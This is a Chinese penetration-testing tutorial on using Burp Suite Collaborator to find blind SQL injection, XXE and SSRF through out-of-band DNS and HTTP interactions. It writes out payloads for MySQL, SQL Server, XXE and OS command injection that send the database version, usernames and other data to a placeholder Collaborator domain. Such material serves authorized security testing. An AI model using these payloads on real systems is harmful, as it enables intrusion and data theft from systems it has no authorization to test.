当前位置: 首页 > news >正文

在实际渗透测试中,如何通过Burp Suite的Collaborator功能检测盲注和带外数据泄露?

news 2026/6/23 21:33:40

Burp Suite的Collaborator功能通过带外(Out-of-Band)技术检测盲注和带外数据泄露,其核心原理是让目标服务器与外部Collaborator服务器发生交互,从而验证漏洞的存在并获取数据。

一、Collaborator工作原理

Collaborator服务器运行在公网上,拥有自己的专用域名(如burpcollaborator.net),并注册为该域名的权威DNS服务器。当Burp Suite向目标应用发送包含Collaborator域名的payload时,如果存在漏洞,目标服务器会尝试解析或访问该域名,Collaborator服务器会记录这些交互行为,并将信息返回给Burp Suite。

二、盲注漏洞检测方法

1. 盲SQL注入检测

基本payload构造

' AND (SELECT LOAD_FILE(CONCAT('\\\\',(SELECT DATABASE()),'.xxxxxxxx.burpcollaborator.net\\abc')))--

利用DNS外带数据

  • 通过DNS查询将数据库信息外带

  • 使用nslookupping命令触发DNS解析

  • 将查询结果作为子域名的一部分发送到Collaborator服务器

2. 盲XXE检测

payload构造

<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://xxxxxxxx.burpcollaborator.net"> %xxe; ]> <test>test</test>

如果存在XXE漏洞,目标服务器会尝试访问Collaborator服务器,Collaborator会记录HTTP请求和DNS解析记录。

3. 盲SSRF检测

payload构造

http://xxxxxxxx.burpcollaborator.net

将Collaborator域名作为SSRF payload发送,如果存在SSRF漏洞,目标服务器会发起HTTP请求到Collaborator服务器。

三、带外数据泄露利用

1. 操作系统命令注入数据外带

Linux系统

curl http://$(whoami).xxxxxxxx.burpcollaborator.net nslookup $(whoami).xxxxxxxx.burpcollaborator.net

Windows系统

nslookup %USERNAME%.xxxxxxxx.burpcollaborator.net

通过将命令执行结果作为子域名的一部分,将数据外带到Collaborator服务器。

2. SQL注入数据外带

MySQL数据库

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT @@version),'.xxxxxxxx.burpcollaborator.net\\abc'))

SQL Server数据库

DECLARE @host varchar(8000); SELECT @host = (SELECT @@version); EXEC('master..xp_dirtree "\\'+@host+'.xxxxxxxx.burpcollaborator.net\abc"');

利用数据库函数将查询结果通过DNS查询外带。

四、实战操作步骤

1. 配置Collaborator

在Burp Suite中打开Burp → Burp Collaborator client,点击Copy to clipboard生成Collaborator域名,设置轮询间隔(Poll every)。

2. 构造payload

在Repeater模块中,右键选择Insert Collaborator payload将Collaborator域名插入到参数值中,或手动构造payload。

3. 发送请求并监控

发送构造的请求后,返回Collaborator客户端,点击Poll now查看交互记录。Collaborator会显示:

  • DNS查询记录:证明目标服务器尝试解析域名

  • HTTP请求记录:包含请求方法、路径、头部信息

  • 来源IP:帮助确认哪个系统发起的请求

4. 数据提取

通过分析Collaborator接收到的DNS查询或HTTP请求,可以获取:

  • 操作系统类型和版本

  • 数据库版本信息

  • 系统用户名

  • 文件内容(通过XXE或文件包含)

  • 内网IP和端口信息

五、注意事项

  1. 网络限制:目标服务器必须能够访问互联网,且DNS解析不受限制

  2. 防火墙/IDS:出站流量可能被安全设备拦截

  3. 延迟执行:某些漏洞可能异步执行,需要持续轮询Collaborator

  4. 合法授权:必须在授权范围内使用,推荐使用合法靶场环境

Collaborator功能极大地提高了盲注漏洞的检测效率,通过带外技术解决了传统盲注测试中无法直接获取回显信息的问题。

http://www.cnnetsun.cn/news/112866.html

相关文章:

  • “期刊论文不是‘投稿机器’,是科学对话的邀请函——宏智树AI期刊论文功能,让每一篇投稿都自带‘学术社交力’”
  • Vulkan教程(十二):图形管线,Vulkan 渲染的核心流程
  • “场景化 + 利益前置” 风格拟定标题,从多学科适配、专业级控制、高效协作三大维度重构内容,突出宏智树 AI 绘图功能的差异化优势:
  • 电商网站链接失效危机?快马AI解决方案全解析
  • 为什么网站无法打开-eshukan.com
  • AI如何解决TLS协议版本不匹配问题
  • 查重不是“安检门”,而是你学术表达的“校音器”——宏智树AI免费查重,让引用有回响,原创有回声
  • Git删除过去分支(如删除23年及之前的分支)
  • AB测试:数据驱动决策的科学与艺术
  • 零基础学会用vue-qrcode制作第一个二维码
  • foreach vs for循环:大数据量下的性能对比实验
  • 3.9 Elasticsearch-跨集群搜索(CCS)与跨集群复制(CCR)
  • 用NATS+AI快速构建物联网数据采集原型
  • Excel格式转换异常?新手必看的5分钟解决指南
  • 【智能聊天助手部署教程 (基于 Streamlit + Ollama)】
  • 好写作AI第二大脑:当研究灵感不再碎片化,你的“学术外脑”已上线
  • 好写作AI第二大脑:当研究灵感不再碎片化,你的“学术外挂”已上线
  • 守护代码世界的守门人——软件测试团队心理健康白皮书
  • PinWin窗口置顶工具:提升Windows多任务效率的终极指南
  • Sheet-to-Doc:用Excel数据和Word模板自动生成文档
  • 27岁,转行网络安全,是这辈子最成功的一件事......_27岁开始搞网安好吗
  • 基于 OpenCV C# 的直线卡尺工具源码分享
  • FunASR多说话人识别终极指南:从实战到深度解析
  • SpringAI基于pgvector存储向量
  • 15天零基础打造Android视频录制终极方案:基于FFmpeg的微信级体验完整实现
  • 终极指南:macOS iSCSI启动器完整配置与使用详解
  • 【计算机毕业设计案例】基于SpringBoot+微信小程序的智能在线预约挂号系统基于springboot+微信小程序的智能医疗管理系统设计与实现(程序+文档+讲解+定制)
  • 【计算机毕业设计案例】基于springboot+微信小程序的校园活动管理系统设计与实现在线活动发布、报名管理与学生互动平台(程序+文档+讲解+定制)
  • HMC218BMS8GETR,3.5-8 GHz GaAs MMIC双平衡混频器, 现货库存
  • 直流电机控制仿真:Matlab/Simulink 实现